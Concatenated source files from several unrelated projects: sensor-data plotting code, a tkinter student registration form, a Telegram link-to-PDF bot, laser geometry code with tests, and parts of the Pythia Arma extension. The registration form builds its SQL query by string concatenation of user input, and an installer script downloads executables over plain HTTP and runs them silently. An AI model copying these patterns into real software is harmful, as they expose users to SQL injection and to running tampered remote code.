end + datetime.timedelta(hours=2, minutes=5),
base=base,
collection=collection)
for placement in ["belt",
"bracelet_right",
"bracelet_left",
"ankle",
"bracelet_right "]:
for suffix in ["egw", "amb", "app"]:
founds = [item for item in payload if item["SourceId"] == f"sens_{placement}_accel_{suffix}"]
if founds == []:
continue
t, m = ac.magnitude_response_to_data(founds)
ax.plot(
pd.to_datetime(t, unit="ms"),
m,
label = f"{placement} {suffix}",
alpha = 0.8)
ax.legend()
ax.set_xlim((start, end))
except Exception as e:
if len(t) == 0:
ax.text(start, 1, f"No raw magnitude data to plot")
ax.set_title("No raw magnitude data to plot")
else:
ax.text(start, 1, f"Accelerometry querying raised {e}")
ax.text(start, 0.7, f"Got exception: {e}")
ax.set_ylim((0, 1.5))
ax.set_title(f"{loc_id} clip sensor data, {base} database\nmobility instructed")
ax.set_ylabel("Magnitude (g)")
ax.set_xlabel("Datetime (UTC)")
ax2.set_ylabel("feat_mobility_activity")
try:
payload = ac.download_coaching_walking(loc_id,
start, end + datetime.timedelta(hours=2), base = base
)
ts = [item["Data"]["Timestamp"] for item in payload]
states = [item["Data"]["Measurements"][0] for item in payload]
ax2.scatter(pd.to_datetime(ts, unit="ms",),
states,
s=4)
ax2.set_xlabel(f"UTC datetime")
except Exception as e:
#breakpoint()
if len(ts) == 0:
ax2.set_xlabel(f"No walking classifier data found!")
ax2.set_title(f"No data found.")
else:
ax2.set_xlabel(f"Walking classifier states querying raised {e}")
ax2.set_title(f"Got exception: {e}")
fig.autofmt_xdate()
return fig
def plot_cooking(loc_id, start, end, base, **kwargs):
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
#import pdb; pdb.set_trace()
def _parse_cooking_coaching(rezlist: list):
"""Returns timestamps, coaching actions and feat_activity_cooking_weekly_average
from input that should be a list of database items.
Rezlist = download_coaching_cooking(loc_id, start, end)"""
timestamps = [item.get("Timestamp") for item in rezlist]
coaching_actions = [item.get("CoachingAction") for item in rezlist]
completions = [item.get("Completion") for item in rezlist]
facwa = [item.get("Parameters").get("feat_activity_cooking_weekly_average") for item in rezlist]
#completions = [item if item else np.nan for item in completions]
def assign_color(label):
if not label:
return "k"
elif label == 2:
return "r"
elif label == 1:
return "tab:orange"
elif label == 0:
return "green"
else:
raise ValueError(f"Got a weird completion: {label}")
colors = [assign_color(item) for item in completions]
return pd.to_datetime(timestamps, unit="s"), coaching_actions, facwa, completions, colors
def _parse_cooking_data(data_list: list):
datetimes = pd.to_datetime([item.get("Data").get('Timestamp') for item in data_list], unit="ms")
try:
values = [item.get("Data").get('Measurements')[0].get("dP") for item in data_list]
except:
values = [item.get("Data").get('Measurements')[0] for item in data_list]
return datetimes, values
extended_start = start - datetime.timedelta(days=1)
extended_end = end + datetime.timedelta(days=1)
ax.set_xlim((start, end))
# Deal with sensor data
cooking_data_dict = ac.download_cooking_data(loc_id, start, end, base)
for feature, data in cooking_data_dict.items():
datetimes, values = _parse_cooking_data(data)
if not values:
continue
ax.scatter(datetimes, values, label=feature)
# Deal with coachings:
rezlist = ac.download_coaching_cooking(loc_id, start, end, base=base)
ts, cs, facwas, completions, colors = _parse_cooking_coaching(rezlist)
del rezlist
ax2 = ax.twinx()
ax2.step(ts, facwas, label="cooking\nweekly average")
for x, y, s, c, completion in zip(ts, facwas, cs, colors, completions):
s = s.replace("_", " ")
if s.startswith("negative"):
s = "negative msg"
if s.startswith("positive"):
s = "positive msg"
if completion is not None:
if completion == 2:
s += " (declined)"
elif completion == 1:
s += " (can not)"
elif completion == 0:
s += " (done)"
ax2.text(x, y, s, color=c, rotation=60, horizontalalignment="center", verticalalignment="center")
# for x, y, s in zip(ts, facwas, completions):
# if not s:
# continue
# if s == 0:
# s = "Done"
# if s == 1:
# s = "Can not"
# if s == 2:
# s = "Declined"
# ax2.text(x, y, f"Completion: {s}", color="red", rotation=60, horizontalalignment="center", verticalalignment="bottom")
lines1, labels1 = ax.get_legend_handles_labels()
lines2, labels2 = ax2.get_legend_handles_labels()
ax.legend(lines1+lines2, labels1+labels2, ncol=2)
ax.set_ylabel("Energy (W)")
ax2.set_ylabel("Cooking weekly average")
ax.set_title(f"{loc_id}, cooking, {base} base")
ax.set_xlabel("Datetime (UTC)")
fig.autofmt_xdate()
return fig
def plot_sleep_coaching(loc_id, start, end, base="prod"):
fig, ax = plt.subplots(figsize = (10, 5))
ax.set_title(f"Sleep coaching evaluation,\n{loc_id}, {base} database")
datadict = ac.process_data(loc_id, start, end, base=base)
eff_key = 'fuse_sleep_efficiency'
coach_key = 'coach_sleep_quality'
# Plot fuse_sleep_efficiency:
timestamps = datadict[eff_key]["timestamps_ms"]
measurements = datadict[eff_key]["values"]
timestamps = pd.to_datetime(timestamps, unit="ms", utc=True)
#breakpoint()
assert len(timestamps) == len(measurements), "Timestamps and values have different length"
ax.scatter(timestamps, measurements, label=eff_key)
ax.plot(timestamps, measurements, label=eff_key)
ax.set_ylabel(eff_key)
#breakpoint()
ax.set_ylim((ax.get_ylim()[0], ax.get_ylim()[1]*1.3))
# Plot coachings:
timestamps = datadict[coach_key]["timestamps_ms"]
measurements = datadict[coach_key]["values"]
timestamps = pd.to_datetime(timestamps, unit="ms", utc=True)
#breakpoint()
def assign_colour(s):
if s == "no_action":
return "k"
if "doctor" in s:
return "r"
if "go_to_bed" in s:
return "b"
if "get_up" in s:
return "g"
else:
return "orange"
for t, c in zip(timestamps, measurements):
try:
ax.text(t, 1, c.replace("_", " "), rotation=45, color=assign_colour(c), va="top")
except:
pass
fig.autofmt_xdate()
#plt.tight_layout()
return fig
``` |
{
"source": "5sai/Registration-form",
"score": 4
} |
#### File: 5sai/Registration-form/College Submission Form.py
```python
from tkinter import *
import mysql.connector as mysql
'''creating a root'''
root=Tk()
root.geometry("500x500")
root.title("college student forum")
def Submit():
fname=e_1.get()
lname=e_2.get()
sname=e_3.get()
gender=e_4.get()
email=e_5.get()
Phone=e_6.get()
address=e_7.get()
if(fname=="" or lname=="" or sname=="" or gender=="" or email=="" or Phone=="" or address==""):
print("fill form")
else:
conn=mysql.connect(host="localhost",user="root",password="",database="Registration form")
cursor=conn.cursor()
cursor.execute("insert into student values('"+ fname +"','" + lname +"','"+ sname +"','"+ gender +"','"+ email +"','"+ Phone +"','"+ address +"')")
conn.commit()
registration=Label(root,text="Registration form",width="25",font="20",bg="yellow",fg="red")
registration.place(x=160,y=30)
Fname=Label(root,text="First name :",width="20",font="20",fg="red")
Fname.place(x=50,y=100)
Lname=Label(root,text="Last name :",width="20",font="20",fg="red")
Lname.place(x=50,y=130)
Sname=Label(root,text="Sur name :",width="20",font="20",fg="red")
Sname.place(x=50,y=160)
Gender=Label(root,text="Gender :",width="20",font="20",fg="red")
Gender.place(x=50,y=190)
Email=Label(root,text="Email :",width="20",font="20",fg="red")
Email.place(x=50,y=220)
Phone=Label(root,text="Phone number :",width="20",font="20",fg="red")
Phone.place(x=50,y=250)
Address=Label(root,text="Address",width="20",font="20",fg="red")
Address.place(x=50,y=280)
e_1=Entry(root,width="25")
e_1.place(x=280,y=105)
e_2=Entry(root,width="25")
e_2.place(x=280,y=135)
e_3=Entry(root,width="25")
e_3.place(x=280,y=165)
e_4=Entry(root,width="25")
e_4.place(x=280,y=195)
e_5=Entry(root,width="25")
e_5.place(x=280,y=225)
e_6=Entry(root,width="25")
e_6.place(x=280,y=255)
e_7=Entry(root,width="25")
e_7.place(x=280,y=285)
Button(root, text="Submit",width="25",font="20",bg="yellow",fg="red",command=Submit).place(x=160,y=405)
root.mainloop()
``` |
{
"source": "5samagi/LinkpdfBot",
"score": 2
} |
#### File: 5samagi/LinkpdfBot/bot.py
```python
import os
import requests
import weasyprint
import urllib.request
from presets import Presets
from bs4 import BeautifulSoup
from pyrogram import Client, filters
from pyrogram.types import Message, InlineKeyboardMarkup, InlineKeyboardButton, CallbackQuery
if bool(os.environ.get("ENV", False)):
from sample_config import Config
else:
from config import Config
# -------------------------- Bot Configuration ---------------------------------------------- #
Bot = Client(
"link2PdfBot",
bot_token=Config.TG_BOT_TOKEN,
api_id=Config.APP_ID,
api_hash=Config.API_HASH,
)
# ------------------------------ Start Command ---------------------------------------------- #
@Bot.on_message(filters.private & filters.command(["start", "help"]))
async def start_bot(self, m: Message):
await m.reply_text(
Presets.START_TXT.format(m.from_user.first_name),
reply_to_message_id=m.message_id,
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[InlineKeyboardButton("🛡 Support Channel", url="t.me/UpdateBots1"),
InlineKeyboardButton("🎯 Source", url="https://github.com/INDOHACKER-XODE")]
]
)
)
# -------------------------------- Main execution fn --------------------------------------- #
@Bot.on_message(filters.private & filters.text)
async def link_extract(self, m: Message):
if not m.text.startswith("http"):
await m.reply_text(
Presets.INVALID_LINK_TXT,
reply_to_message_id=m.message_id,
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton("Close", callback_data="close_btn")]]
)
)
return
file_name = str()
#
thumb_path = os.path.join(os.getcwd(), "img")
if not os.path.isdir(thumb_path):
os.makedirs(thumb_path)
urllib.request.urlretrieve(Presets.THUMB_URL, os.path.join(thumb_path, "thumbnail.png"))
else:
pass
#
thumbnail = os.path.join(os.getcwd(), "img", "thumbnail.png")
#
await self.send_chat_action(m.chat.id, "typing")
msg = await m.reply_text(Presets.PROCESS_TXT, reply_to_message_id=m.message_id)
try:
req = requests.get(m.text)
# using the BeautifulSoup module
soup = BeautifulSoup(req.text, 'html.parser')
# extracting the title frm the link
for title in soup.find_all('title'):
file_name = str(title.get_text()) + '.pdf'
# Creating the pdf file
weasyprint.HTML(m.text).write_pdf(file_name)
except Exception:
await msg.edit_text(
Presets.ERROR_TXT,
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton("Close", callback_data="close_btn")]]
)
)
return
try:
await msg.edit(Presets.UPLOAD_TXT)
except Exception:
pass
await self.send_chat_action(m.chat.id, "upload_document")
await m.reply_document(
document=file_name,
caption=Presets.CAPTION_TXT.format(file_name),
thumb=thumbnail
)
print(
'@' + m.from_user.username if m.from_user.username else m.from_user.first_name,
"has downloaded the file",
file_name
)
try:
os.remove(file_name)
except Exception:
pass
await msg.delete()
# --------------------------------- Close Button Call Back --------------------------------- #
@Bot.on_callback_query(filters.regex(r'^close_btn$'))
async def close_button(self, cb: CallbackQuery):
await self.delete_messages(
cb.message.chat.id,
[cb.message.reply_to_message.message_id, cb.message.message_id]
)
print(f"\n\nBot Started Successfully !\n\n")
Bot.run()
``` |
{
"source": "5sam/ScanUS",
"score": 3
} |
#### File: 5sam/ScanUS/laser.py
```python
import math
import numpy as np
from transform import Matrix, mult
TOWER_POS = [-110.46551, 563.0474, 79]
TOWER_ANGLES = [0, 0, (180 + 11.1) * 2 * math.pi / 360]
WRIST_POS = [0, 0, 0]
WRIST_ANGLES = [0, 0, 0]
LASER_POS = [0, 1, 0]
SCREW_HEIGHT_PER_TURN = .15
# Matrix from top of tower center of laser
def get_wrist_matrix(angle_wrist=0):
fixed_matrix = Matrix(pos=WRIST_POS, angles=WRIST_ANGLES)
variable_matrix = Matrix(angles=[angle_wrist, 0, 0])
return mult([fixed_matrix, variable_matrix])
# Rotation of infinite screw to heigth in mm
def angle_to_dist(angle_tower):
num_turn = angle_tower / (2 * math.pi)
dist = num_turn * SCREW_HEIGHT_PER_TURN
return dist
# Matrix from base of tower to top of moving part(top of tower)
def get_tower_matrix(angle_tower=0):
height = angle_to_dist(angle_tower)
fixed_matrix = Matrix(pos=TOWER_POS, angles=TOWER_ANGLES)
variable_matrix = Matrix(pos=[0, 0, height])
return mult([fixed_matrix, variable_matrix])
# gets line (matrix) of line in world
def get_laser_line_in_world(angle_table=0, angle_tower=0, angle_wrist=0):
floor_matrix = Matrix(angles=[0, 0, angle_table])
wrist_matrix = get_wrist_matrix(angle_wrist)
tower_matrix = get_tower_matrix(angle_tower)
laser_matrix = mult([floor_matrix, tower_matrix, wrist_matrix])
return laser_matrix
# transform line(matrix) to line(point,vector)
def get_laser_point_vector_in_world(angle_table=0, angle_tower=0, angle_wrist=0):
laser_matrix_world = get_laser_line_in_world(angle_table, angle_tower, angle_wrist)
point = laser_matrix_world.get_pos()
unit_vector_matrix = Matrix(pos=[0, 1, 0])
point_vector_direction = mult([laser_matrix_world, unit_vector_matrix])
vector = point_vector_direction.get_pos() - point
return point, vector
```
#### File: 5sam/ScanUS/test_camera.py
```python
import unittest
import numpy as np
import camera
import cv2
from math import pi
import transform
test_image_good = 'D:\_Udes\S4\Projet\ScanUS\Photos_boite\photo_0.png'
test_image_bad = 'D:\_Udes\S4\Projet\ScanUS\imagetestjuan.jpg'
class TestCamera(unittest.TestCase):
def test_find_red_dot(self):
frame = []
np.testing.assert_allclose(camera.find_red_dot(frame), [0, 0, True])
frame = cv2.imread(test_image_good)
## actual value obtained with paint
np.testing.assert_allclose(camera.find_red_dot(frame), [462, 637, False], atol=.5)
frame = cv2.imread(test_image_bad)
## actual value obtained with paint
np.testing.assert_allclose(camera.find_red_dot(frame), [0, 0, True])
def test_get_camera_matrix(self):
CAM_POS = [10, -1, 32]
CAM_ANGLES = [0, 0, 0]
TABLE_ANGLE = -pi/2
EXPECTED_POS = [-1, -10, 32]
np.testing.assert_allclose(
camera.get_camera_ext_matrix(angle_table=TABLE_ANGLE, cam_pos=CAM_POS, cam_angles=CAM_ANGLES).get_pos(),
EXPECTED_POS)
EXPECTED_ANGLE_MATRIX = [[0, 1, 0],
[-1, 0, 0],
[0, 0, 1]]
np.testing.assert_allclose(
camera.get_camera_ext_matrix(angle_table=TABLE_ANGLE, cam_pos=CAM_POS,
cam_angles=CAM_ANGLES).get_angle_matrix(),
EXPECTED_ANGLE_MATRIX, atol=0.01)
``` |
{
"source": "5sigmapoint2/pythiaparser",
"score": 2
} |
#### File: pythiaparser/pythia/Adapter.py
```python
import importlib
import sys
import traceback
from antlr4.CommonTokenStream import CommonTokenStream
from antlr4.InputStream import InputStream
from antlr4.tree.Tree import ParseTreeWalker
from pythia.antlr4.PythiaFunctionCallLexer import PythiaFunctionCallLexer
from pythia.antlr4.PythiaFunctionCallListener import PythiaFunctionCallListener
from pythia.antlr4.PythiaFunctionCallParser import PythiaFunctionCallParser
# ----------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------
class FunctionCall(PythiaFunctionCallListener):
def __init__(self):
self.module_name = ""
self.function_name = ""
self.function_fqn = ""
self.args = ()
self.mem = {}
def exitCall(self, ctx: PythiaFunctionCallParser.CallContext):
self.args = tuple(self.mem[arg_ctx] for arg_ctx in ctx.argument())
def exitFull_function_name(self,
ctx: PythiaFunctionCallParser.Full_function_nameContext):
self.function_fqn = ctx.getText().strip('\'')
self.module_name, self.function_name = self.function_fqn.rsplit('.', 1)
def exitArgument(self, ctx: PythiaFunctionCallParser.ArgumentContext):
self.mem[ctx] = self.mem[ctx.value()]
def exitArrayOfValues(self,
ctx: PythiaFunctionCallParser.ArrayOfValuesContext):
self.mem[ctx] = [self.mem[value_ctx] for value_ctx in ctx.value()]
def exitEmptyArray(self, ctx: PythiaFunctionCallParser.EmptyArrayContext):
self.mem[ctx] = []
def exitArrayValue(self, ctx: PythiaFunctionCallParser.ArrayValueContext):
self.mem[ctx] = self.mem[ctx.array()]
def exitString(self, ctx: PythiaFunctionCallParser.StringContext):
self.mem[ctx] = ctx.getText().strip('\'')
def exitInteger(self, ctx: PythiaFunctionCallParser.IntegerContext):
self.mem[ctx] = int(ctx.getText())
def exitFloat(self, ctx: PythiaFunctionCallParser.FloatContext):
self.mem[ctx] = float(ctx.getText())
# ----------------------------------------------------------------------------
# The Extension entry point in python
# ----------------------------------------------------------------------------
def python_adapter(input_string):
try:
if input_string == "":
return format_error_string("Input string cannot be empty")
call = parse_input(input_string)
return_value = python_proxy(
call.module_name,
call.function_name,
call.function_fqn,
*call.args)
return format_response_string(return_value)
except:
return format_error_string(traceback.format_exc())
# ----------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------
def parse_input(input_string):
input = InputStream(input_string)
function_call = FunctionCall()
walker = ParseTreeWalker()
walker.walk(
function_call,
PythiaFunctionCallParser(
CommonTokenStream(
PythiaFunctionCallLexer(input))).call())
return function_call
# ----------------------------------------------------------------------------
# Performs the call
# ----------------------------------------------------------------------------
def python_proxy(module_name, function_name, function_fqn, *args):
global FUNCTION_CACHE
try:
function = FUNCTION_CACHE[function_fqn]
except KeyError: # Function not cached, load the module
try:
module = sys.modules[module_name]
except KeyError:
# Module not imported yet, import it
module = importlib.import_module(module_name)
# Get the requested function
function = getattr(module, function_name)
FUNCTION_CACHE[function_fqn] = function
# Call the requested function with the given arguments
return function(*args)
# ----------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------
def format_error_string(stacktrace_str):
"""Return a formatted exception."""
return '["e", "{}"]'.format(stacktrace_str.replace('"', '""'))
# ----------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------
def format_response_string(return_value):
"""Return a formatted response.
For now, it's just doing a dumb str() which may or may not work depending
on the arguments passed. This should work as long as none of the arguments
contain double quotes (").
"""
return str(["r", return_value])
###############################################################################
# Below are testing functions which exist solely to check if everything is
# working correctly.
# If someone wants to check if their python module works, they should Call
# Pythia.test() and later Pythia.ping() to make sure they understand the syntax
###############################################################################
def test(*args):
return "OK"
def ping(*args):
return list(args)
FUNCTION_CACHE = {
'Pythia.ping': ping,
'Pythia.test': test,
}
# Somehow Visual Studio cannot load this if there is a newline at The
# end of the file
``` |
{
"source": "5sigmapoint2/Pythia",
"score": 2
} |
#### File: adapter_import_test/module_one/file_one.py
```python
print('Interpreting module_one.file_one.py')
def fun():
print('module_one::file_one::fun()')
return 'module_one::file_one::fun()'
```
#### File: adapter_import_test/module_two/file_two.py
```python
print('Interpreting module_two.file_two.py')
def fun():
print('module_two::file_two::fun()')
return 'module_two::file_two::fun()'
```
#### File: Pythia/python/examples.py
```python
def test(*args):
"""Always return the string "OK"."""
return "OK"
def ping(*args):
"""Return the list of arguments passed to the function.
The function name is omitted in the list returned.
"""
return list(args)
def get_multiples(multiplier, count):
"""Return [0, 1*multiplier, 2*multiplier, ...]."""
return [i * multiplier for i in range(count)]
```
#### File: Pythia/tests/tests.py
```python
import os
import platform
import shutil
import subprocess
import unittest
def setUpModule(): # noqa
Base.ensure_no_tester()
tester_path = os.path.join(Base.this_dir, '..', '@Pythia', Base.pythia_tester())
shutil.copy2(tester_path, Base.this_dir)
def tearDownModule(): # noqa
Base.ensure_no_tester()
class Base(unittest.TestCase):
this_dir = os.path.abspath(os.path.dirname(__file__))
pythia_path = os.path.join('..', '@Pythia')
@staticmethod
def pythia_tester():
name = 'PythiaTester'
if platform.architecture()[0] == '64bit':
name += '_x64'
if platform.system() == 'Windows':
name += '.exe'
return name
def _call_tester(self, *args, loaded_pbos=None, timeout=10):
if not loaded_pbos:
loaded_pbos = []
cmd = [os.path.abspath(os.path.join(self.this_dir, self.pythia_tester()))]
for pbo in loaded_pbos:
cmd.extend(['-o', pbo])
cmd += args
process = subprocess.run(cmd, capture_output=True, timeout=timeout, text=True, cwd=self.this_dir)
return process.stdout, process.stderr, process.returncode
@staticmethod
def create_request(function, args):
return f'["{function}", {args}]'
@staticmethod
def ensure_no_tester():
try:
os.remove(os.path.join(Base.this_dir, Base.pythia_tester()))
except FileNotFoundError:
pass
def setUp(self):
self.maxDiff = 3000
class RequirementsInstaller(Base):
def _install_requirements(self, requirements_file_path):
requirements_installer_path = os.path.join(self.this_dir, self.pythia_path, 'install_requirements')
if platform.system() == 'Windows':
requirements_installer_path += '.bat'
else:
requirements_installer_path += '.sh'
if platform.system() == 'Windows':
cmd = ['cmd', '/c', requirements_installer_path, 'nopause', requirements_file_path]
else:
cmd = ['/bin/bash', requirements_installer_path, requirements_file_path]
process = subprocess.run(cmd, capture_output=True, timeout=120, text=True, cwd=self.this_dir)
try:
self.assertEqual(process.returncode, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(process.stdout)
print(process.stderr)
raise
class TestBasicPing(Base):
def test_sanity_cant_open_with_local_dir(self):
request = self.create_request('pythia.ping', [1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
output, err, code = self._call_tester('.', request)
try:
self.assertNotEqual(code, 0, 'Calling the tester with the wrong path should fail')
except AssertionError:
print(output)
raise
self.assertIn('Could not open', output)
def test_sanity_can_open_with_pythia_dir(self):
request = self.create_request('pythia.ping', [1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
output, err, code = self._call_tester(self.pythia_path, request)
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2,3,4,5,6,7,8,9,0]]')
class TestMods(Base):
def test_basic_loaded_mod(self):
request = self.create_request('basic.function', [1, 2, 3])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@BasicMod', 'addons', 'basic_mod.pbo')])
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2,3]]')
def test_renamed_loaded_mod(self):
request = self.create_request('renamed.function', [1, 2, 3, 4])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@RenamedMod', 'addons', 'renamed_mod.pbo')])
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2,3,4]]')
def test_special_chars_loaded_mod(self):
request = self.create_request('zolw.function', [1, 2, 3, 4, 5])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@ŻółwMod', 'addons', 'żółw_mod.pbo')])
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2,3,4,5]]')
class TestSpecialCharsPythia(Base):
special_chars_pythia_path = '@ŻółwPythia'
def delete_link(self):
try:
os.remove(os.path.abspath(os.path.join(self.this_dir, self.special_chars_pythia_path)))
except (FileNotFoundError, PermissionError, IsADirectoryError):
pass
# Linux symlink + Windows junction
try:
os.rmdir(os.path.abspath(os.path.join(self.this_dir, self.special_chars_pythia_path)))
except FileNotFoundError:
pass
def make_link(self, existing_directory, new_name):
if platform.system() == 'Windows':
cmd = ['cmd', '/c', 'mklink', '/J', new_name, existing_directory]
subprocess.run(cmd, check=True, cwd=self.this_dir)
else: # Linux
os.symlink(existing_directory, new_name)
def setUp(self):
super().setUp()
self.delete_link()
self.make_link(os.path.join(self.this_dir, self.pythia_path),
os.path.abspath(os.path.join(self.this_dir, self.special_chars_pythia_path)))
def tearDown(self):
super().tearDown()
self.delete_link()
def test_pythia_in_directory_with_special_chars(self):
request = self.create_request('basic.function', [1, 2])
output, err, code = self._call_tester(self.special_chars_pythia_path, request,
loaded_pbos=[os.path.join('@BasicMod', 'addons', 'basic_mod.pbo')])
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2]]')
class TestRequirements(RequirementsInstaller):
def _uninstall_requests(self):
request = self.create_request('requirements_mod.uninstall_requests', [])
output, err, code = self._call_tester(
self.pythia_path, request, loaded_pbos=[os.path.join('@RequirementsMod', 'addons', 'requirements_mod.pbo')])
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
self.assertTrue(output == '["r",nil]' or 'Successfully uninstalled requests' in output)
def _check_if_requests_fail(self):
request = self.create_request('requirements_mod.get_requests_version', [])
output, err, code = self._call_tester(
self.pythia_path, request, loaded_pbos=[os.path.join('@RequirementsMod', 'addons', 'requirements_mod.pbo')])
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
self.assertIn('ModuleNotFoundError', output)
def _check_if_requests_installed(self):
request = self.create_request('requirements_mod.get_requests_version', [])
output, err, code = self._call_tester(
self.pythia_path, request, loaded_pbos=[os.path.join('@RequirementsMod', 'addons', 'requirements_mod.pbo')])
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
self.assertEqual(output, '["r","2.26.0"]')
def test_installing_requirements(self):
requirements_file_path = os.path.join(self.this_dir, '@RequirementsMod', 'requirements.txt')
self._uninstall_requests()
self._check_if_requests_fail()
self._install_requirements(requirements_file_path)
self._check_if_requests_installed()
class TestCython(RequirementsInstaller):
def setUp(self):
super().setUp()
self.clean_directories()
def tearDown(self):
super().tearDown()
self.clean_directories()
def clean_directories(self):
directories = [
os.path.join(self.this_dir, '@CythonMod'),
os.path.join(self.this_dir, '@CythonMod', 'cython_basic'),
os.path.join(self.this_dir, '@CythonNumpyMod'),
os.path.join(self.this_dir, '@CythonNumpyMod', 'cython_numpy_basic'),
]
for d in directories:
shutil.rmtree(os.path.join(d, 'build'), ignore_errors=True)
for f in os.listdir(d):
filename, ext = os.path.splitext(f)
if ext in ['.c', '.pyd', '.so']:
os.unlink(os.path.join(d, f))
def test_cython_mod(self):
# Install the Cython requirements to build the extension
requirements_file_path = os.path.join(self.this_dir, '@CythonMod', 'requirements.txt')
self._install_requirements(requirements_file_path)
# Note: DON'T do this normally. This is just a workaround to ensure
# that the right python interpreter is called! You're supposed to have
# a script that will probably call both pythons in sequence to build
# the extension for both 32bit and 64bit
setup_py_path = os.path.join(self.this_dir, '@CythonMod')
request = self.create_request('cython_basic.compile_python_extension_do_not_use_this_way', [setup_py_path])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@CythonMod', 'addons', 'cython_mod.pbo')],
timeout=30)
# Mild check
self.assertIn('running build_ext', output)
self.assertNotIn('failed', output)
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
# Try calling the function
request = self.create_request('cython_basic.function', [1, 2, 3])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@CythonMod', 'addons', 'cython_mod.pbo')])
self.assertEqual(output, '["r","Hello from cython!"]')
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
def test_cython_numpy_mod(self):
# Install the Cython requirements to build the extension
requirements_file_path = os.path.join(self.this_dir, '@CythonNumpyMod', 'requirements.txt')
self._install_requirements(requirements_file_path)
# Note: DON'T do this normally. This is just a workaround to ensure
# that the right python interpreter is called! You're supposed to have
# a script that will probably call both pythons in sequence to build
# the extension for both 32bit and 64bit
setup_py_path = os.path.join(self.this_dir, '@CythonNumpyMod')
request = self.create_request('cython_numpy_basic.compile_python_extension_do_not_use_this_way',
[setup_py_path])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@CythonNumpyMod', 'addons',
'cython_numpy_mod.pbo')],
timeout=60)
# Mild check
self.assertIn('running build_ext', output)
self.assertNotIn('failed', output)
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
# Try calling the function
request = self.create_request('cython_numpy_basic.function', [1, 2, 3, 4])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@CythonNumpyMod', 'addons',
'cython_numpy_mod.pbo')])
self.assertEqual(output, '["r","Hello from numpy cython!"]')
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
class TestLongDirectory(Base):
dir_length = 250
def _delete_directory(self):
try:
shutil.rmtree(os.path.join(self.this_dir, '0' * self.dir_length))
except FileNotFoundError:
pass
def setUp(self):
super().setUp()
self._delete_directory()
current_dir = os.getcwd()
try:
# Create the directory by chdiring and creating a subdirectory one by one
# Because it's sometimes a problem to give abspaths... supposedly
os.chdir(self.this_dir)
for i in range(10):
next_dir = str(i) * self.dir_length
os.mkdir(next_dir)
os.chdir(next_dir)
self.long_directory_path = os.getcwd()
shutil.copytree(os.path.join(self.this_dir, '@BasicMod'),
os.path.join(self.long_directory_path, '@BasicMod'))
finally:
os.chdir(current_dir)
def tearDown(self):
super().tearDown()
self._delete_directory()
def test_long_directory(self):
request = self.create_request('basic.function', [6, 7, 8])
output, err, code = self._call_tester(
self.pythia_path,
request,
loaded_pbos=[os.path.join(self.long_directory_path, '@BasicMod', 'addons', 'basic_mod.pbo')]
)
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[6,7,8]]')
if __name__ == '__main__':
unittest.main()
```
#### File: Pythia/tools/install_mikeros_tools.py
```python
import contextlib
import os
import shutil
import subprocess
import sys
import tempfile
import urllib.request
import xml.etree.ElementTree as ET
"""Fetch and install missing Mikero's tools"""
toms_depot = 'http://tom4897.info/app/tools/community/'
disk_location = r'C:\Program Files (x86)\Mikero\DePboTools\bin' + '\\'
required_tools = {
'DePbo': disk_location + 'DePbo64.dll',
'MakePbo': disk_location + 'MakePbo.exe',
'DeOgg': disk_location + 'deOgg64.dll',
}
@contextlib.contextmanager
def tempdir(prefix='tmp'):
"""A context manager for creating and then deleting a temporary directory."""
tmpdir = tempfile.mkdtemp(prefix=prefix)
try:
yield tmpdir
finally:
shutil.rmtree(tmpdir)
def download_and_run(url, file_name):
print ('Downloading {} from: {}'.format(file_name.split('.')[0], url))
with tempdir() as directory:
file_path = os.path.join(directory, file_name)
file_raw = urllib.request.urlopen(url).read()
with open(file_path, "wb") as location:
location.write(file_raw)
print('Running installer...')
subprocess.check_call([file_path, '/S'], shell=True)
def all_installed(required_tools):
for tool_name, tool_path in required_tools.items():
if not os.path.exists(tool_path):
return False
return True
def install_tools(required_tools):
xml = urllib.request.urlopen(toms_depot + 'xml').read()
root = ET.fromstring(xml)
tools = root.findall('tool')
print('Fetching and installing tools...')
for tool_name, tool_path in required_tools.items():
if os.path.exists(tool_path):
print('{} is already installed, continuing...'.format(tool_name))
continue
tool = root.find("tool[@toolName='{}']".format(tool_name))
file_name = tool.get('fileName')
download_url = toms_depot + file_name
download_and_run(download_url, file_name)
def main():
if all_installed(required_tools):
print('All required Mikero tools are already installed. Exiting...')
sys.exit(0)
install_tools(required_tools)
